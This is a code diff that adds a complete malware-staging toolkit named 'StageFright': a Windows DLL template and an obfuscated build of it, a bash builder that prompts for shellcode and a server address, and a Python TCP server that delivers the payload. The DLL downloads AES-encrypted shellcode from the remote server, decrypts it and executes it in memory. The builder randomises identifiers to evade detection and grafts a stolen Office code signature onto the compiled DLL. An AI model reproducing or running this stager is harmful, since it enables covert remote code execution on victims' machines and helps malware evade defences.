+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+    if (!CryptHashData(hHash, (BYTE*)iNjzxZyJyK, (DWORD)iNjzxZyJyKlen, 0)) {
+        return -1;
+    }
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, gwtamZsHddxtV, &gwtamZsHddxtV_len)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char iNjzxZyJyK[] =  { 0x59, 0xfa, 0xe2, 0x44, 0x6c, 0xf1, 0x9e, 0xf6, 0xdf, 0xd8, 0x4e, 0x16, 0xcd, 0xf5, 0x8a, 0xf6 };;
+
+extern "C" void CALLBACK Go(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
+    const char* OQmbgsGuW = "192.168.1.12";        // Replace with the actual server IP
+    int yprPDCUUPq = 8080;                     // Replace with the actual server port
+    const char* Random4 = "invoice.txt";   // Replace with the actual file path on the server
+
+    char* GugJH;
+    size_t ENUQBQQ;
+
+    if (WXEjtHeXGRaH(OQmbgsGuW, yprPDCUUPq, Random4, GugJH, ENUQBQQ)) {
+        printf("Binary data received successfully.\n");
+
+        // Print received data size for debugging
+        printf("Received data size: %zu\n", ENUQBQQ);
+
+        kaRyEcluPiEW((char*)GugJH, ENUQBQQ, iNjzxZyJyK, sizeof(iNjzxZyJyK));
+
+        // Allocate executable memory with READ, WRITE permissions
+        LPVOID executableMemory = VirtualAlloc(NULL, ENUQBQQ, MEM_COMMIT, PAGE_READWRITE);
+        if (executableMemory == NULL) {
+            DWORD error = GetLastError();
+            printf("Error allocating executable memory: %d\n", error);
+            delete[] GugJH;
+            return;
+        }
+
+        // Copy binary data to the executable memory
+        memcpy(executableMemory, GugJH, ENUQBQQ);
+
+        // Change the protection to PAGE_EXECUTE_READ
+        DWORD oldProtect;
+        if (!VirtualProtect(executableMemory, ENUQBQQ, PAGE_EXECUTE_READ, &oldProtect)) {
+            DWORD error = GetLastError();
+            printf("Error changing memory protection: %d\n", error);
+            VirtualFree(executableMemory, 0, MEM_RELEASE);
+            delete[] GugJH;
+            return;
+        }
+
+        // Create a function pointer to the shellcode
+        HUUTjodrPVG pCyhiFoGQ = reinterpret_cast<HUUTjodrPVG>(executableMemory);
+
+        // Call the shellcode function
+        printf("Executing shellcode...\n");
+        pCyhiFoGQ();
+
+        // No freeing of allocated memory in this POC
+
+        printf("Shellcode executed successfully.\n");
+
+        // Free allocated memory
+        delete[] GugJH;
+    } else {
+        printf("Failed to receive binary data.\n");
+        return;
+    }
+}
+
+

StageFright/StageFright/StageFright/TCPDLL/TCPDLL.sh

@@ -0,0 +1,175 @@
+#!/bin/bash
+
+# Color variables
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+cat << "EOF"
+TCP DLL STAGER                        
+
+EOF
+
+echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
+echo ""
+read Shellcode
+echo ""
+echo -e ${green}"What's The IP For Your TCP Server?"${clear}
+echo ""
+read HOSTIP
+echo ""
+echo -e ${green}"What Is The Port Your TCP Server Is Using?"${clear}
+echo ""
+read PORTY
+echo ""
+echo -e ${green}"Name Your Shellcode File. ex: invoice.txt"${clear}
+echo ""
+read SHELLCODEFILE
+echo ""
+echo -e ${green}"Name Your Entry Point Function"${clear}
+echo ""
+read ENTRYPOINT
+echo ""
+echo -e ${green}"Name Your Malware! ex: malware.dll"${clear}
+echo ""
+read MALWARE
+echo ""
+cp StageFright/TCPDLL/template.cpp StageFright/TCPDLL/Resources/template.cpp
+echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
+echo ""
+sleep 2
+python3 StageFright/TCPDLL/Resources/aesencrypt.py $Shellcode > shell.txt
+echo -e ${yellow}"***Encryption Completed***"${clear}
+echo ""
+cp shell.txt shell2.txt
+
+#Generate AES Key
+keys=$(cat "shell2.txt")
+cut -d 'p' -f1 shell2.txt > shell3.txt
+keys=$(cat shell3.txt)
+keysnow=${keys#*=}
+sed -i "s/KEYVALUE/$keysnow/g" StageFright/TCPDLL/Resources/template.cpp
+
+#Generate AES Payload
+payload=$(cat "shell.txt")
+payloadnow=${payload#*;}
+payloadtoday=${payloadnow#*=}
+echo $payloadtoday > shell5.txt
+cp StageFright/TCPDLL/conv.py StageFright/TCPDLL/Resources/con.py
+perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i StageFright/TCPDLL/Resources/con.py
+sed -i "s/{/[/g" -i StageFright/TCPDLL/Resources/con.py
+sed -i "s/}/]/g" -i StageFright/TCPDLL/Resources/con.py
+sed -i "s/;//g" -i StageFright/TCPDLL/Resources/con.py
+python3 StageFright/TCPDLL/Resources/con.py
+#rm StageFright/TCPDLL/Resources/con.py
+mv payload.bin $SHELLCODEFILE
+sleep 2
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomE=$(cat shell.txt)
+sed -i "s/RandomE/$RandomE/g" StageFright/TCPDLL/Resources/template.cpp
+
+
+#Replace IP, PORT and SHELLCODEFILE
+sed -i "s/ENTRYPOINT/$ENTRYPOINT/g" StageFright/TCPDLL/Resources/template.cpp
+sed -i "s/HOSTIP/$HOSTIP/g" StageFright/TCPDLL/Resources/template.cpp
+sed -i "s/PORTY/$PORTY/g" StageFright/TCPDLL/Resources/template.cpp
+sed -i "s/SHELLCODEFILE/$SHELLCODEFILE/g" StageFright/TCPDLL/Resources/template.cpp
+#Replacing Values
+
+# Get Payload From URL Function
+
+#FindShare
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random1=$(cat shell.txt)
+sed -i "s/Random1/$Random1/g" StageFright/TCPDLL/Resources/template.cpp
+
+#pPayloadBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+Random2=$(cat shell.txt)
+sed -i "s/Random2/$Random2/g" StageFright/TCPDLL/Resources/template.cpp
+
+#sPayloadSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random3=$(cat shell.txt)
+sed -i "s/Random3/$Random3/g" StageFright/TCPDLL/Resources/template.cpp
+
+#sPayloadSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random4=$(cat shell.txt)
+
+sed -i "s/Random3/$Random3/g" StageFright/TCPDLL/Resources/template.cpp
+#bSTATE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
+Random5=$(cat shell.txt)
+sed -i "s/Random5/$Random5/g" StageFright/TCPDLL/Resources/template.cpp
+
+#sSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-7} | head -n 1 > shell.txt
+Random6=$(cat shell.txt)
+sed -i "s/Random6/$Random6/g" StageFright/TCPDLL/Resources/template.cpp
+
+#hInternet
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random7=$(cat shell.txt)
+sed -i "s/Random7/$Random7/g" StageFright/TCPDLL/Resources/template.cpp
+
+#dwBytesRead
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-13} | head -n 1 > shell.txt
+Random8=$(cat shell.txt)
+sed -i "s/Random8/$Random8/g" StageFright/TCPDLL/Resources/template.cpp
+
+#pBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random9=$(cat shell.txt)
+sed -i "s/Random9/$Random9/g" StageFright/TCPDLL/Resources/template.cpp
+
+#PAYLOAD
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomA=$(cat shell.txt)
+sed -i "s/RandomA/$RandomA/g" StageFright/TCPDLL/Resources/template.cpp
+
+#Sleep Function
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomJ=$(cat shell.txt)
+sed -i "s/RandomJ/$RandomJ/g" StageFright/TCPDLL/Resources/template.cpp
+
+#AES KEY NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+RandomK=$(cat shell.txt)
+sed -i "s/RandomK/$RandomK/g" StageFright/TCPDLL/Resources/template.cpp
+
+# Main Function
+
+#Bytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomB=$(cat shell.txt)
+sed -i "s/RandomB/$RandomB/g" StageFright/TCPDLL/Resources/template.cpp
+
+#Size
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomC=$(cat shell.txt)
+sed -i "s/RandomC/$RandomC/g" StageFright/TCPDLL/Resources/template.cpp
+
+#Compile
+
+echo -e ${yellow}"+++Compiling Malware+++"${clear}
+x86_64-w64-mingw32-g++ -shared -o $MALWARE StageFright/TCPDLL/Resources/template.cpp -lws2_32 -lntdll -static-libgcc -static-libstdc++ -Wl,--subsystem,windows -O2 -Wno-narrowing -fpermissive >/dev/null 2>&1
+echo ""
+sleep 2
+rm shell*
+echo -e ${yellow}"***Malware Compiled***"${clear}
+echo ""
+sleep 2
+echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
+echo ""
+sleep 2
+python3 StageFright/Resources/SigThief/sigthief.py -i StageFright/Resources/OfficeSetup.exe -t $MALWARE -o signed$MALWARE >/dev/null 2>&1
+mv signed$MALWARE $MALWARE
+echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
+echo ""

StageFright/StageFright/StageFright/TCPDLL/conv.py

@@ -0,0 +1,4 @@
+buf=PAYVAL 
+payload = bytes(bytearray(buf))
+with open('payload.bin', 'wb') as f:
+    f.write(payload)

StageFright/StageFright/StageFright/TCPDLL/template.cpp

@@ -0,0 +1,188 @@
+#include <winsock2.h>
+#include <ws2tcpip.h>
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32")
+#include <psapi.h>
+
+// Define the shellcode function signature
+typedef void (*RandomA)();
+
+bool Random1(const char* Random2, int Random3, const char* Random4, char*& Random5, size_t& Random6) {
+    WSADATA wsaData;
+    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
+        printf("Failed to initialize Winsock.\n");
+        return false;
+    }
+
+    SOCKET clientSocket = socket(AF_INET, SOCK_STREAM, 0);
+    if (clientSocket == INVALID_SOCKET) {
+        perror("Error creating socket");
+        WSACleanup();
+        return false;
+    }
+
+    sockaddr_in serverAddress{};
+    serverAddress.sin_family = AF_INET;
+    serverAddress.sin_port = htons(Random3);
+    serverAddress.sin_addr.s_addr = inet_addr(Random2);
+
+    if (serverAddress.sin_addr.s_addr == INADDR_NONE) {
+        perror("Invalid address/Address not supported");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    if (connect(clientSocket, (struct sockaddr*)&serverAddress, sizeof(serverAddress)) < 0) {
+        perror("Connection failed");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    // Send the length of the file path first
+    size_t Random4Len = strlen(Random4);
+    printf("Sending file path length: %zu\n", Random4Len);
+    send(clientSocket, reinterpret_cast<char*>(&Random4Len), sizeof(Random4Len), 0);
+
+    // Send the file path to the server
+    printf("Sending file path: %s\n", Random4);
+    send(clientSocket, Random4, Random4Len, 0);
+
+    int fileSize;
+    int bytesRead = recv(clientSocket, reinterpret_cast<char*>(&fileSize), sizeof(fileSize), 0);
+    if (bytesRead != sizeof(fileSize)) {
+        printf("Error receiving file size: %d\n", WSAGetLastError());
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    fileSize = ntohl(fileSize); // Convert from network byte order to host byte order
+
+    printf("Received file size: %d\n", fileSize);
+    // Receive and save the binary data in a dynamically allocated buffer
+    Random5 = new char[fileSize];
+    if (Random5 == nullptr) {
+        printf("Error allocating memory for binary data.\n");
+        closesocket(clientSocket);
+        WSACleanup();
+        return false;
+    }
+
+    size_t totalSize = 0;
+    while (totalSize < fileSize) {
+        bytesRead = recv(clientSocket, Random5 + totalSize, fileSize - totalSize, 0);
+        if (bytesRead <= 0) {
+            printf("Error receiving binary data: %d\n", WSAGetLastError());
+            delete[] Random5;
+            closesocket(clientSocket);
+            WSACleanup();
+            return false;
+        }
+        totalSize += bytesRead;
+    }
+
+    // Close the socket
+    closesocket(clientSocket);
+
+    Random6 = totalSize;
+    printf("Received data size: %zu\n", Random6);
+
+    return true;
+}
+
+int Random7(char* Random8, unsigned int Random8_len, char* Random9, size_t Random9len) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+    if (!CryptHashData(hHash, (BYTE*)Random9, (DWORD)Random9len, 0)) {
+        return -1;
+    }
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random8, &Random8_len)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char Random9[] = KEYVALUE;
+
+extern "C" void CALLBACK ENTRYPOINT(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
+    const char* Random2 = "HOSTIP";        // Replace with the actual server IP
+    int Random3 = PORTY;                     // Replace with the actual server port
+    const char* Random4 = "SHELLCODEFILE";   // Replace with the actual file path on the server
+
+    char* Random5;
+    size_t Random6;
+
+    if (Random1(Random2, Random3, Random4, Random5, Random6)) {
+        printf("Binary data received successfully.\n");
+
+        // Print received data size for debugging
+        printf("Received data size: %zu\n", Random6);
+
+        Random7((char*)Random5, Random6, Random9, sizeof(Random9));
+
+        // Allocate executable memory with READ, WRITE permissions
+        LPVOID executableMemory = VirtualAlloc(NULL, Random6, MEM_COMMIT, PAGE_READWRITE);
+        if (executableMemory == NULL) {
+            DWORD error = GetLastError();
+            printf("Error allocating executable memory: %d\n", error);
+            delete[] Random5;
+            return;
+        }
+
+        // Copy binary data to the executable memory
+        memcpy(executableMemory, Random5, Random6);
+
+        // Change the protection to PAGE_EXECUTE_READ
+        DWORD oldProtect;
+        if (!VirtualProtect(executableMemory, Random6, PAGE_EXECUTE_READ, &oldProtect)) {
+            DWORD error = GetLastError();
+            printf("Error changing memory protection: %d\n", error);
+            VirtualFree(executableMemory, 0, MEM_RELEASE);
+            delete[] Random5;
+            return;
+        }
+
+        // Create a function pointer to the shellcode
+        RandomA RandomB = reinterpret_cast<RandomA>(executableMemory);
+
+        // Call the shellcode function
+        printf("Executing shellcode...\n");
+        RandomB();
+
+        // No freeing of allocated memory in this POC
+
+        printf("Shellcode executed successfully.\n");
+
+        // Free allocated memory
+        delete[] Random5;
+    } else {
+        printf("Failed to receive binary data.\n");
+        return;
+    }
+}
+
+

StageFright/StageFright/setup.sh

@@ -0,0 +1,8 @@
+#!/bin/bash
+apt update -y
+cd StageFright/Resources/
+apt-get install mingw-w64 -y
+git clone https://github.com/secretsquirrel/SigThief.git
+mv SigThief/ StageFright/Resources/
+pip install pycryptodome
+

StageFright/StageFright/tcp_server.py

@@ -0,0 +1,69 @@
+import socketserver
+import os
+
+class MyHandler(socketserver.BaseRequestHandler):
+    def handle(self):
+        print("Connection received from:", self.client_address)
+
+        try:
+            # Receive file path length
+            path_len_bytes = self.request.recv(8)
+            if not path_len_bytes:
+                print("Error receiving file path length.")
+                return
+
+            path_len = int.from_bytes(path_len_bytes, byteorder='little')  # Change byte order to 'little'
+            print(f"Received file path length: {path_len}")
+
+            # Receive file path
+            file_path_bytes = b""
+            while len(file_path_bytes) < path_len:
+                received_data = self.request.recv(path_len - len(file_path_bytes))
+                if not received_data:
+                    print("Error receiving file path.")
+                    return
+                file_path_bytes += received_data
+
+            file_name = file_path_bytes.decode('utf-8')
+            print("Received file name:", file_name)
+
+            # Check if the file exists
+            file_path = os.path.join(os.getcwd(), file_name)
+            print("Absolute file path:", file_path)
+            if os.path.exists(file_path):
+                print("File found:", file_path)
+
+                # Read file data
+                with open(file_path, 'rb') as file:
+                    file_data = file.read()
+
+                # Print the size before sending
+                file_size = len(file_data)
+                print("Size of file:", file_size)
+
+                # Send file size to the client
+                self.request.sendall(file_size.to_bytes(4, byteorder='big'))
+
+                # Send file data back to the client
+                self.request.sendall(file_data)
+                print("File data sent successfully.")
+
+            else:
+                print("File not found:", file_path)
+                self.request.sendall(b"FILE_NOT_FOUND")
+
+        except Exception as e:
+            print("Error:", str(e))
+            self.request.sendall(b"SERVER_ERROR")
+
+if __name__ == "__main__":
+    host, port = "192.168.1.12", 8080
+    server = socketserver.TCPServer((host, port), MyHandler)
+    print(f"Server listening on {host}:{port}")
+
+    try:
+        server.serve_forever()
+    except KeyboardInterrupt:
+        print("Server shutting down.")
+        server.shutdown()
+